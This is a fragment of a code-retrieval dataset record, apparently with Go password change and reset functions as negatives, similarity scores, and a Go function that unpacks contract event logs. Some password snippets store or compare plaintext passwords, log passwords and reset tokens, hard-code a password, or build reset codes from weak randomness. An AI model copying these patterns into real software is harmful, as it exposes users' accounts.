again.\"))\n\t\t}\n\t\treturn err\n\t}\n\n\treturn c.JSON(http.StatusOK, password)\n}", "func UpdateAccountPassword(w http.ResponseWriter, r *http.Request) {\n\tlogin := mux.Vars(r)[\"login\"]\n\toauth, ok := OAuthToken(r)\n\tif !ok {\n\t\tpanic(\"Request was authorized but no OAuth token is available!\") // this should never happen\n\t}\n\n\taccount, ok := data.GetAccountByLogin(login)\n\tif !ok {\n\t\tPrintErrorJSON(w, r, \"The requested account does not exist\", http.StatusNotFound)\n\t\treturn\n\t}\n\n\tif oauth.Token.AccountUUID.String != account.UUID || !oauth.Match.Contains(\"account-write\") {\n\t\tPrintErrorJSON(w, r, \"Access to requested account forbidden\", http.StatusUnauthorized)\n\t\treturn\n\t}\n\n\tpwData := &struct {\n\t\tPasswordOld string `json:\"password_old\"`\n\t\tPasswordNew string `json:\"password_new\"`\n\t\tPasswordNewRepeat string `json:\"password_new_repeat\"`\n\t}{}\n\tdec := json.NewDecoder(r.Body)\n\t_ = dec.Decode(pwData)\n\n\tif !account.VerifyPassword(pwData.PasswordOld) {\n\t\terr := &util.ValidationError{\n\t\t\tMessage: \"Unable to set password\",\n\t\t\tFieldErrors: map[string]string{\"password_old\": \"Wrong password\"}}\n\t\tPrintErrorJSON(w, r, err, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif len(pwData.PasswordNew) < 6 {\n\t\terr := &util.ValidationError{\n\t\t\tMessage: \"Unable to set password\",\n\t\t\tFieldErrors: map[string]string{\"password_new\": \"Password must be at least 6 characters long\"}}\n\t\tPrintErrorJSON(w, r, err, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif pwData.PasswordNew != pwData.PasswordNewRepeat {\n\t\terr := &util.ValidationError{\n\t\t\tMessage: \"Unable to set password\",\n\t\t\tFieldErrors: map[string]string{\"password_new_repeat\": \"Repeated password does not match\"}}\n\t\tPrintErrorJSON(w, r, err, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\terr := account.UpdatePassword(pwData.PasswordNew)\n\tif err != nil {\n\t\tPrintErrorJSON(w, r, err, http.StatusInternalServerError)\n\t\treturn\n\t}\n}", "func ChangePassword(templateDir string) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tu, a := currentUser(r)\n\t\tif u == \"\" {\n\t\t\thttp.Error(w, \"no user information\", http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\n\t\tif r.Method == \"GET\" {\n\t\t\tFetch(templateDir, \"changePassword.html\").Execute(w, u, a, m{})\n\t\t\treturn\n\t\t}\n\n\t\tr.ParseForm()\n\n\t\tp := r.FormValue(\"oldPassword\")\n\t\tpN := r.FormValue(\"newPassword\")\n\t\tpNC := r.FormValue(\"confirmNewPassword\")\n\n\t\t// Check that this user is actually who they claim they are\n\t\tok, err := database.CheckCredentials(u, p)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t} else if !ok {\n\t\t\tFetch(templateDir, \"changePassword.html\").Execute(w, u, a, m{Error: \"Invalid username or password\"})\n\t\t\treturn\n\t\t}\n\n\t\t// Make sure the user REALLY knows their new password and it isn't empty\n\t\tif pN != pNC || pN == \"\" {\n\t\t\tFetch(templateDir, \"changePassword.html\").Execute(w, u, a, m{Error: \"Passwords do not match.\"})\n\t\t\treturn\n\t\t}\n\n\t\t// Perform the password update\n\t\tbpass, err := bcrypt.GenerateFromPassword([]byte(pN), bcrypt.DefaultCost)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\terr = database.UpdatePassword(u, bpass)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tFetch(templateDir, \"changePassword.html\").Execute(w, u, a, m{Success: \"Password updated successfully.\"})\n\t}\n}", "func (f *Firebase) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\tw.WriteHeader(http.StatusOK)\n}", "func ApiSettingsPassword(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {\n\tif !lib.IsLoggedIn(r) {\n\t\tSendJsonMessage(w, http.StatusUnauthorized, false, \"Unauthorized.\")\n\t\treturn\n\t}\n\n\t// Get data from Request\n\tr.ParseForm()\n\tvalue := r.Form.Get(\"password\")\n\n\t// Simple Validation\n\tif value == \"\" {\n\t\tSendJsonMessage(w, http.StatusBadRequest, false, \"Unable to process your Request: Submit a valid value.\")\n\t\treturn\n\t}\n\n\t// Update Password\n\tadmin := lib.Admin{}\n\terr := admin.ChangePassword(value)\n\tif err != nil {\n\t\tSendJsonMessage(w, http.StatusInternalServerError, false, \"Unable to process your Request: \"+err.Error())\n\t\treturn\n\t}\n\tSendJsonMessage(w, http.StatusOK, true, \"\")\n}", "func (u *UsersController) Reset(ctx *gin.Context) {\n\tvar userJSON userResetJSON\n\tctx.Bind(&userJSON)\n\tvar userIn tat.User\n\tuserIn.Username = strings.TrimSpace(userJSON.Username)\n\tuserIn.Email = strings.TrimSpace(userJSON.Email)\n\tcallback := strings.TrimSpace(userJSON.Callback)\n\n\tif len(userIn.Username) < 3 || len(userIn.Email) < 7 {\n\t\terr := fmt.Errorf(\"Invalid username (%s) or email (%s)\", userIn.Username, userIn.Email)\n\t\tAbortWithReturnError(ctx, http.StatusInternalServerError, err)\n\t\treturn\n\t}\n\n\ttokenVerify, err := userDB.AskReset(&userIn)\n\tif err != nil {\n\t\tlog.Errorf(\"Error while AskReset %s\", err)\n\t\tctx.JSON(http.StatusInternalServerError, gin.H{\"error\": err.Error()})\n\t\treturn\n\t}\n\n\tgo userDB.SendAskResetEmail(userIn.Username, userIn.Email, tokenVerify, callback)\n\tctx.JSON(http.StatusCreated, gin.H{\"info\": \"please check your mail to validate your account\"})\n}", "func (db *MyConfigurations) performResetPasswordByEmail(c echo.Context) error {\n\temail := c.QueryParam(\"email\")\n\thash := c.QueryParam(\"hash\")\n\turl := \"/email-reset-password?email=\" + email + \"&hash=\" + hash\n\tvar otp models.OTP\n\n\tpassword := strings.TrimSpace(c.FormValue(\"password\"))\n\tpasswordVerify := strings.TrimSpace(c.FormValue(\"passwordVerify\"))\n\n\tif len(password) == 0 {\n\t\treturn redirectWithFlashMessage(\"failure\", \"يجب تحديد كيمه السر الجديده\", url, &c)\n\t}\n\tif password != passwordVerify { // checks that the password is equal to the password verification\n\t\t// if not, redirect to /reset-password-by-email with failure flash message\n\t\treturn redirectWithFlashMessage(\"failure\", \"كلمه السر ليست متطابقه\", url, &c)\n\t}\n\n\tdb.GormDB.Table(\"otps\").First(&otp, \"email = ? AND verification_code = ?\", email, hash)\n\totp.Used = true\n\tdb.GormDB.Save(&otp)\n\tdb.GormDB.Where(\"email = ? AND user_id = ?\", email, otp.UserID).Delete(models.OTP{})\n\thashedPassword, _ := bcrypt.GenerateFromPassword([]byte(password), 10) // hash the password that the user entered\n\tdb.GormDB.Model(&models.User{}).Where(\"id = ?\", otp.UserID).Update(\"password\", string(hashedPassword))\n\n\treturn redirectWithFlashMessage(\"success\", \"تم تغيير كلمه السر\", \"/login\", &c)\n}", "func (u *User) ChangePassword(tx *pop.Connection) (*validate.Errors, error) {\n\t// find user by email\n\tquery := tx.Where(\"email = ?\", u.Email)\n\tqueryUser := User{}\n\terr := query.First(&queryUser)\n\tif err != nil {\n\t\treturn nil, errors.New(\"User not found\")\n\t}\n\tlog.Infof(\"%s == %s\\n\", u.ResetTokenConfirm, queryUser.ResetToken)\n\tif u.ResetTokenConfirm != queryUser.ResetToken {\n\t\treturn nil, errors.New(\"Tokens do not match\")\n\t}\n\tqueryUser.Password = u.Password\n\tqueryUser.PasswordConfirm = u.PasswordConfirm\n\treturn queryUser.Update(tx)\n}", "func (m *UserMutation) ResetPassword() {\n\tm.password = nil\n}", "func (m *UserMutation) ResetPassword() {\n\tm.password = nil\n}", "func (m *UserMutation) ResetPassword() {\n\tm.password = nil\n}", "func (m *UserMutation) ResetPassword() {\n\tm.password = nil\n}", "func PasswordResetPostHandler(ctx *enliven.Context) {\n\tcode, ok := ctx.Vars[\"code\"]\n\tif !ok || code == \"\" {\n\t\tctx.Forbidden()\n\t\treturn\n\t}\n\n\tdb := database.GetDatabase()\n\tu := User{}\n\tdb.Where(\"Verification_Code = ?\", code).First(&u)\n\n\tif u.ID == 0 {\n\t\tctx.Forbidden()\n\t\treturn\n\t}\n\n\tctx.Request.ParseForm()\n\t// TODO: Reset the user's password to the posted values here.\n\n\tu.Status = 1\n\tu.VerificationCode = \"\"\n\tdb.Save(&u)\n\n\tctx.ExecuteBaseTemplate(\"user_password_reset\")\n}", "func (this *managerStruct) SetPassword(name string, password string) error {\n\tthis.mutex.Lock()\n\tid := this.getUserId(name)\n\n\t/*\n\t * Check if we have a user with this ID.\n\t */\n\tif id < 0 {\n\t\tthis.mutex.Unlock()\n\t\treturn fmt.Errorf(\"User '%s' does not exist.\", name)\n\t} else {\n\t\tprng := this.prng\n\t\tsalt := make([]byte, LENGTH)\n\t\tnumBytes, err := prng.Read(salt)\n\n\t\t/*\n\t\t * Check if salt was generated.\n\t\t */\n\t\tif err != nil {\n\t\t\tthis.mutex.Unlock()\n\t\t\treturn fmt.Errorf(\"Failed to generate salt for user '%s' password change.\", name)\n\t\t} else if numBytes != LENGTH {\n\t\t\tthis.mutex.Unlock()\n\t\t\treturn fmt.Errorf(\"Failed to generate salt for user '%s': Incorrect number of bytes read from PRNG: Expected %d, got %d.\", name, LENGTH, numBytes)\n\t\t} else {\n\t\t\tpwdBytes := []byte(password)\n\t\t\tpwdHash := sha512.Sum512(pwdBytes)\n\t\t\tsaltAndHash := append(salt[:], pwdHash[:]...)\n\t\t\tusers := this.users\n\t\t\tfinalHash := sha512.Sum512(saltAndHash)\n\t\t\tusers[id].hash = finalHash[:]\n\t\t\tcopy(users[id].salt[:], salt)\n\t\t\tthis.mutex.Unlock()\n\t\t\treturn nil\n\t\t}\n\n\t}\n\n}", "func (m *EmployeeMutation) ResetPassword() {\n\tm._Password = nil\n}", "func (rep rep_users) UpdatePassword(id uint64, passwordHash string) error {\n\tstatement, erro := rep.db.Prepare(\"UPDATE usuarios SET senha = ? WHERE id = ?\")\n\n\tif erro != nil {\n\t\treturn erro\n\t}\n\n\tdefer statement.Close()\n\n\tif _, erro = statement.Exec(passwordHash, id); erro != nil {\n\t\treturn erro\n\t}\n\n\treturn nil\n}", "func ChangePass(w http.ResponseWriter, r *http.Request) {\r\n\tlogin := strings.Trim(r.FormValue(\"login\"), \" \")\r\n\tpass := strings.Trim(r.FormValue(\"pass\"), \" \")\r\n\r\n\t// Check params\r\n\tif login == \"\" || pass == \"\" {\r\n\t\twriteResponse(w, \"Login and password required\\n\", http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\r\n\tnewPass := strings.Trim(r.FormValue(\"newPass\"), \" \")\r\n\tif newPass == \"\" {\r\n\t\twriteResponse(w, \"newPass required\\n\", http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\r\n\tif Auth[login] != pass {\r\n\t\twriteResponse(w, \"Wrong pass\\n\", http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\r\n\tuser := model.User{}\r\n\terr := user.Get(login, pass) // в Auth можно сохранять id, чтобы не делать этот запрос\r\n\tlog.Println(\"user\", user)\r\n\tif err != nil {\r\n\t\twriteResponse(w, \"Something wrong\\n\", http.StatusInternalServerError)\r\n\t\treturn\r\n\t}\r\n\r\n\tuser.Pass = newPass\r\n\terr = user.Save()\r\n\tif err != nil {\r\n\t\twriteResponse(w, \"Error update password in database\\n\", http.StatusInternalServerError)\r\n\t\treturn\r\n\t}\r\n\r\n\tAuth[user.Login] = user.Pass\r\n\r\n\twriteResponse(w, \"Password changed\\n\", http.StatusOK)\r\n}", "func setPassword(db *sql.DB) (passwd string, err error) {\n\n\tpassAttemptOne, err := gopass.GetPass(\"Please Enter the Password For your New Database:\")\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tpassAttemptTwo, err := gopass.GetPass(\"Please re-enter your new Password:\")\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif passAttemptOne != passAttemptTwo {\n\n\t\tpasswd := \"\"\n\t\terr = fmt.Errorf(\"Sorry, the Passwords you entered dont match\")\n\t\treturn passwd, err\n\n\t}\n\n\thashedPassword := hashStringToSHA256(passAttemptOne)\n\terr = InsertPassword(db, hashedPassword)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn passAttemptOne, err\n\n}", "func UpdatePassword(context *gin.Context) {\n\tuserProfile := models.UserProfile{}\n\tcontext.ShouldBindBodyWith(&userProfile, binding.JSON)\n\n\tmodifiedCount, err := userprofileservice.UpdateByEmail(userProfile)\n\tif modifiedCount == 0 {\n\t\tcontext.JSON(http.StatusNotFound, gin.H{\"message\": \"User not found\"})\n\t\treturn\n\t}\n\n\tif err != nil {\n\t\tcontext.JSON(http.StatusInternalServerError, gin.H{\"message\": \"Failed to update user\"})\n\t\tcontext.Abort()\n\t\treturn\n\t}\n\n\tcontext.JSON(http.StatusOK, gin.H{\"message\": \"ok\"})\n}", "func (s *Shadow) SetChangePasswd() { s.changed = _CHANGE_PASSWORD }", "func (us *UserService) UserSetPassword(id int, hashedPassword string) (*railway.User, error) {\n\tdetails := &MethodInfo{\n\t\tName: \"UserSetPassword\",\n\t\tDescription: \"UserSetPassword is the DB method used to UserSetPassword\",\n\t}\n\ttx, err := us.db.Begin()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, details.Name)\n\t}\n\n\tupdatedUser := &railway.User{}\n\tquery := fmt.Sprintf(`\n\tUPDATE users\n\tSET password=$1,\n\t\tpassword_reset_token=''\n\tWHERE id=$2\n\tRETURNING %s\n`, userAllColumns)\n\n\terr = tx.QueryRow(query, hashedPassword, id).Scan(updatedUser.Scan()...)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, details.Name)\n\t}\n\ttx.Commit()\n\treturn updatedUser, nil\n}", "func (n *User) UpdatePassword(p string) error {\n\tpasswordHash, err := bcrypt.GenerateFromPassword([]byte(p), 10)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Println(p, \"=>\", string(passwordHash))\n\tn.PasswordHash = string(passwordHash)\n\treturn nil\n}", "func (handler *Handler) handlePasswordResetPut(w http.ResponseWriter, r *http.Request) {\n\n\t//Define a local struct to get the email out of the request\n\ttype ResetGet struct {\n\t\tEmail string `json:\"email\"`\n\t\tResetToken string `json:\"reset_token\"`\n\t\tPassword string `json:\"password\"`\n\t}\n\n\t//Create a new password change object\n\tinfo := ResetGet{}\n\n\t//Now get the json info\n\terr := json.NewDecoder(r.Body).Decode(&info)\n\tif err != nil {\n\t\tutils.ReturnJsonError(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\n\t}\n\n\t//Lookup the user id\n\tuser, err := handler.userHelper.GetUserByEmail(info.Email)\n\n\t//Return the error\n\tif err != nil {\n\t\tutils.ReturnJsonStatus(w, http.StatusForbidden, false, \"password_change_forbidden\")\n\t\treturn\n\t}\n\n\t//Try to use the token\n\trequestId, err := handler.userHelper.CheckForResetToken(user.Id(), info.ResetToken)\n\n\t//Return the error\n\tif err != nil {\n\t\tutils.ReturnJsonStatus(w, http.StatusForbidden, false, \"password_change_forbidden\")\n\t\treturn\n\t}\n\n\t//Now update the password\n\terr = handler.userHelper.passwordChangeForced(user.Id(), user.Email(), info.Password)\n\t//Return the error\n\tif err != nil {\n\t\tutils.ReturnJsonError(w, http.StatusForbidden, err)\n\t\treturn\n\t}\n\t//Mark the request as used\n\terr = handler.userHelper.UseToken(requestId)\n\n\t//Check to see if the user was created\n\tif err == nil {\n\t\tutils.ReturnJsonStatus(w, http.StatusAccepted, true, \"password_change_success\")\n\t} else {\n\t\tutils.ReturnJsonError(w, http.StatusForbidden, err)\n\t}\n}", "func (u *Users) CompleteReset(w http.ResponseWriter, r *http.Request) {\n\tvar vd views.Data\n\tvar form ResetPwForm\n\tvd.Yield = &form\n\tif err := parse(r, &form); err != nil {\n\t\tvd.SetAlert(err)\n\t\tu.ResetPwView.Render(w, r, vd)\n\t\treturn\n\t}\n\n\tuser, err := u.UserService.CompleteReset(form.Token, form.Password)\n\tif err != nil {\n\t\tvd.SetAlert(err)\n\t\tu.ResetPwView.Render(w, r, vd)\n\t\treturn\n\t}\n\n\tu.signIn(w, user)\n\tviews.RedirectAlert(w, r, \"/galleries\", http.StatusFound, views.Alert{\n\t\tLevel: views.AlertLvlSuccess,\n\t\tMessage: \"Your password has been reset and you have been logged in!\",\n\t})\n}", "func SetNewPass(email, pass string) {\n\tDb.Debug().Table(\"users\").Where(\"email = ?\", email).Update(\"password\", pass)\n}", "func (h *userHandler) changePassword(ctx context.Context, rw http.ResponseWriter, r *http.Request) {\n\n\tvar user = &model.User{}\n\n\t_ = json.NewDecoder(r.Body).Decode(user)\n\n\tif user.Login == \"\" || user.Password == \"\" {\n\n\t\th.serv.writeResponse(ctx, rw, \"Login or password are empty\", http.StatusBadRequest, nil)\n\n\t\treturn\n\t}\n\n\terr := h.serv.DB.UserCol.UpdatePassword(ctx, user)\n\n\tif err != nil {\n\n\t\th.serv.writeResponse(ctx, rw, err.Error(), http.StatusBadRequest, user)\n\n\t\treturn\n\t}\n\n\th.serv.writeResponse(ctx, rw, \"password was updated\", http.StatusOK, user)\n\n\treturn\n\n}", "func updatePasswordHandler(w http.ResponseWriter, r *http.Request){\n\tuserId, err := strconv.ParseInt(r.FormValue(\"userId\"), 10, 64)\n\tcheck(err)\n\n\t// TODO: implement updatePassword form, and get actual password from there.\n\tpasswordHashInts := GetPasswordHash256(\"#NewPassword1234\")\n\n\t// Update user's password in the database.\n\tprf(\"passwordHashInts[0]: %T %#v\\n\", passwordHashInts[0], passwordHashInts[0])\n\tDbQuery(`\n\t\tUPDATE $$User\n\t\tSET PasswordHash = ARRAY[$2::bigint, $3::bigint, $4::bigint, $5::bigint]\n\t\tWHERE Id = $1::bigint`,\n\t\tuserId,\n\t\tpasswordHashInts[0],\n\t\tpasswordHashInts[1],\n\t\tpasswordHashInts[2],\n\t\tpasswordHashInts[3])\n\n\t// TODO: Send password update confirmation email\n\n\t// Create session (encrypted userId).\n\tCreateSession(w, r, userId)\n\n\tprf(\"Updated password for user %d\", userId)\n\n\tserveHtml(w, \"<h2>You successfully updated your password!</h2>\")\n}", "func (s Service) RecoverPassword(ctx context.Context, code, userID, password string) error {\n\tspan := s.tracer.MakeSpan(ctx, \"RecoverPassword\")\n\tdefer span.Finish()\n\n\tmatched, err := s.repository.Cache.CheckTemporaryCodeForRecoveryByEmail(userID, code)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t}\n\tif !matched {\n\t\treturn errors.New(\"wrong_activation_code\")\n\t}\n\n\t// encrypting password\n\tpass, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t\t// internal error\n\t}\n\n\terr = s.repository.Users.ChangePassword(ctx, userID, string(pass))\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t\t// internal error\n\t}\n\n\terr = s.repository.Cache.Remove(userID)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t}\n\n\treturn nil\n}", "func (u UserResource) sendTempPassword(request *restful.Request, response *restful.Response) {\n\temail := request.PathParameter(\"email\")\n\tusr := User{Email: email}\n\tnew_password := Tools.RandString(8)\n\n\tif has, err := db.Engine.Table(\"user\").Where(\"email=?\", email).Get(&usr); err != nil {\n\t\tlog.Error(err)\n\t} else if has {\n\t\tusr.Password = Tools.EncodePassword(new_password)\n\t\tif _, err = db.Engine.Id(usr.ID).Update(usr); err != nil {\n\t\t\tlog.Error(err)\n\t\t}\n\t}\n\tTools.SendPassword(usr.Email, new_password)\n}", "func (c *Config) ForgotPassword(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\n\tvar payload forgotPasswordPayload\n\tif err := bjson.ReadJSON(&payload, r); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tif err := valid.Raw(&payload); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tu, found, err := c.UserStore.GetUserByEmail(ctx, payload.Email)\n\tif err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t} else if found {\n\t\tif err := c.Mail.SendPasswordResetEmail(u,\n\t\t\tu.GetPasswordResetMagicLink(c.Magic)); err != nil {\n\t\t\tlog.Alarm(err)\n\t\t}\n\t}\n\n\tbjson.WriteJSON(w, map[string]string{\n\t\t\"message\": \"Check your email for a link to reset your password\",\n\t}, http.StatusOK)\n}", "func ForgetPassword(input *User) (*User, error) {\n\tuser := getUserByEmail(input.Email)\n\n\tif user == nil {\n\t\treturn nil, fmt.Errorf(\"Invalid email address.\")\n\t} else if user.ActivationCode != nil {\n\t\treturn nil, fmt.Errorf(\"Please activate your account first.\")\n\t}\n\n\t// Store the reset password code to the user\n\thash := md5.New()\n\thash.Write([]byte(fmt.Sprint(user.ID) + time.Now().String()))\n\tresetPasswordCode := hex.EncodeToString(hash.Sum(nil))\n\t// Add one hour to the expiry date for reseting the password\n\tresetPasswordExpiredAt := time.Now().Local().Add(time.Hour * 1)\n\n\tdb := getDB()\n\tdefer db.Close()\n\n\tdb.Model(&user).Update(map[string]interface{}{\n\t\t\"ResetPasswordCode\": resetPasswordCode,\n\t\t\"ResetPasswordExpiredAt\": resetPasswordExpiredAt,\n\t})\n\n\treturn user, nil\n}", "func (m *UserMutation) ResetPassword() {\n\tm.password = nil\n\tdelete(m.clearedFields, user.FieldPassword)\n}", "func (s *UserService) ResetPasswordInit(req *requests.ResetPasswordInit) *response.Base {\n\t//validate user input\n\tif err := req.Validate(); err != nil {\n\t\treturn &response.Base{\n\t\t\tCode: http.StatusBadRequest,\n\t\t\tError: err,\n\t\t\tMessage: \"\",\n\t\t}\n\t}\n\t//check if user exists\n\tuser, err := s.dao.Find(req.Identifier)\n\tif err != nil {\n\t\tlog.Printf(\"user %s not found\\n\", req.Identifier)\n\t\treturn &response.Base{\n\t\t\tCode: http.StatusNotFound,\n\t\t\tError: errors.New(\"user_not_found\"),\n\t\t}\n\t}\n\t//generate reset password code\n\tvar code string\n\tif requests.ValidateEmailAddress(req.Identifier) {\n\t\tcode, tries := \"\", 0\n\t\tfor len(code) < 6 && tries < 3 {\n\t\t\t//generate 6 digits code\n\t\t\tcode = fmt.Sprintf(\"%d\", rand.New(rand.NewSource(time.Now().UnixNano())).Intn(999999))\n\t\t\ttries++\n\t\t}\n\t\tif len(code) != 6 {\n\t\t\treturn &response.Base{\n\t\t\t\tCode: http.StatusInternalServerError,\n\t\t\t\tError: errors.New(\"unknown_error\"),\n\t\t\t}\n\t\t}\n\t\t//send the code to user in email\n\t\tmailer := mails.ResetPasswordEmail{\n\t\t\tTo: user.Email,\n\t\t\tName: user.Name,\n\t\t\tCode: code,\n\t\t}\n\t\tmailer.Send()\n\t} else {\n\t\terr := auth.Get(req.Identifier).Err()\n\t\tif err == nil {\n\t\t\treturn &response.Base{\n\t\t\t\tCode: http.StatusTooManyRequests,\n\t\t\t\tError: errors.New(\"too_many_requests\"),\n\t\t\t}\n\t\t}\n\t\tcode, err = helpers.SendOTP(req.Identifier)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\t\tauth.Set(req.Identifier, code, time.Second*60)\n\t}\n\n\tif err := auth.Set(fmt.Sprintf(\"%d\", user.ID), code, time.Hour); err != nil {\n\t\tlog.Println(err)\n\t}\n\n\treturn &response.Base{\n\t\tCode: http.StatusOK,\n\t\tError: nil,\n\t\tMessage: \"reset_instructions_sent\",\n\t}\n}", "func UpdatePassword(newPW string, userID int) {\n\tsqlStmt := `UPDATE tblUsers\n\t\t\t\tSET fldPassword = ?\n\t\t\t\tWHERE fldID = ?;`\n\n\tstmt, err := globals.Db.Prepare(sqlStmt)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer stmt.Close()\n\n\t// Execute insert and replace with actual values.\n\t_, err = stmt.Exec(newPW, userID)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n}", "func (userHandlersImpl UserHandlersImpl) ResendPassword(w http.ResponseWriter, req *http.Request) {\n\tctx := req.Context()\n\tvars := mux.Vars(req)\n\tid := vars[\"id\"]\n\tlog.Logger(ctx).Info(\"in request\")\n\n\terr := userHandlersImpl.userSvc.ResendPassword(ctx, id)\n\tif err != nil {\n\t\tWriteHTTPError(w, http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresp := \"\"\n\tWriteOKResponse(w, resp)\n}", "func ResetPasswordCheck(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {\n\tw.Header().Add(\"Content-Type\", \"application/json\")\n\tresetToken := ps.ByName(\"reset-token\")\n\n\t// check if user with such token exists and if it has expired\n\tuser := &models.User{}\n\terr := models.DB().Table(\"users\").Where(\"token_reset = ? AND token_reset_expires > ?\", resetToken, time.Now()).First(user).Error\n\tif err != nil {\n\t\tif err == gorm.ErrRecordNotFound {\n\t\t\tresp := map[string]interface{}{\n\t\t\t\t\"status\": false,\n\t\t\t\t\"message\": \"Either your reset token doesn't exist or it has expired\",\n\t\t\t}\n\t\t\tjson.NewEncoder(w).Encode(resp)\n\t\t\treturn\n\t\t}\n\n\t\tresp := map[string]interface{}{\n\t\t\t\"status\": false,\n\t\t\t\"message\": \"DB error\",\n\t\t}\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\t// check if token is valid\n\tjwtT := &models.JwtToken{}\n\ttoken, err := jwt.ParseWithClaims(resetToken, jwtT, func(token *jwt.Token) (interface{}, error) {\n\t\treturn []byte(os.Getenv(\"jwt_secret\")), nil\n\t})\n\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusForbidden)\n\t\tresp := map[string]interface{}{\n\t\t\t\"status\": false,\n\t\t\t\"message\": \"Malformed token\",\n\t\t}\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\tif !token.Valid {\n\t\tw.WriteHeader(http.StatusForbidden)\n\t\tresp := map[string]interface{}{\n\t\t\t\"status\": false,\n\t\t\t\"message\": \"Invalid token\",\n\t\t}\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\tuser.Password = \"\"\n\tresp := map[string]interface{}{\n\t\t\"status\": true,\n\t\t\"message\": \"Token is valid, you can change your password!\",\n\t\t\"user\": user,\n\t}\n\tjson.NewEncoder(w).Encode(resp)\n}", "func (a *UserAPI) ChangePassword(ctx *gin.Context) {\n\tpw := model.UserExternalPass{}\n\tif err := ctx.Bind(&pw); err == nil {\n\t\tuser := a.DB.GetUserByID(auth.GetUserID(ctx))\n\t\tuser.Pass = password.CreatePassword(pw.Pass, a.PasswordStrength)\n\t\ta.DB.UpdateUser(user)\n\t}\n}" ]
[ "0.74520636", "0.72761947", "0.7267525", "0.71116567", "0.7103729", "0.70087475", "0.69554776", "0.69512504", "0.68913746", "0.68597054", "0.6825464", "0.68242425", "0.6756234", "0.6742758", "0.6735563", "0.6732325", "0.6695984", "0.66888964", "0.6677383", "0.6662779", "0.66556555", "0.6627124", "0.6574406", "0.65468365", "0.6543846", "0.65413344", "0.65252745", "0.6521443", "0.65160966", "0.6511452", "0.6509169", "0.6508394", "0.64986813", "0.6484258", "0.6469383", "0.6435792", "0.6430326", "0.6420744", "0.64093584", "0.6390651", "0.63446546", "0.6335607", "0.6326884", "0.62939036", "0.6274935", "0.6274914", "0.626302", "0.62605333", "0.624703", "0.6235602", "0.6224399", "0.6187827", "0.6187827", "0.6159102", "0.6155024", "0.6150258", "0.61434394", "0.613416", "0.613416", "0.613416", "0.6130293", "0.6124214", "0.6123081", "0.61223197", "0.6115314", "0.61151844", "0.61097044", "0.61082417", "0.6093948", "0.6090788", "0.6085008", "0.60832304", "0.60832304", "0.60832304", "0.60832304", "0.6075629", "0.607464", "0.60570276", "0.6051382", "0.6047736", "0.6030382", "0.6005454", "0.6001724", "0.59917134", "0.59774333", "0.59714794", "0.5954666", "0.5951762", "0.59435683", "0.5940384", "0.59300643", "0.5922309", "0.59103036", "0.5901288", "0.5895738", "0.58950186", "0.58821267", "0.588055", "0.587894", "0.5875344" ]
0.6968013
6
Value returns a value constructed from the type of the event and filled via the bound contract's UnpackLog function. The optional typ parameter allows to disambiguate the type to select. This is useful in cases where the ID of an EventInfo refers to multiples EventType where each of the bound contract would be able to unpack the log with no error.
func (ev *EventInfo) Value(log types.Log, typ ...reflect.Type) (res reflect.Value, err error) { var ty reflect.Type if len(typ) > 0 { ty = typ[0] } for _, u := range ev.Types { if ty != nil && ty != u.Type { continue } event := reflect.New(u.Type.Elem()) err = u.BoundContract.UnpackLog(event.Interface(), ev.Name, log) if err != nil { continue } f := event.Elem().FieldByName("Raw") if f.IsValid() && f.CanSet() { f.Set(reflect.ValueOf(log)) } return event, nil } return }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
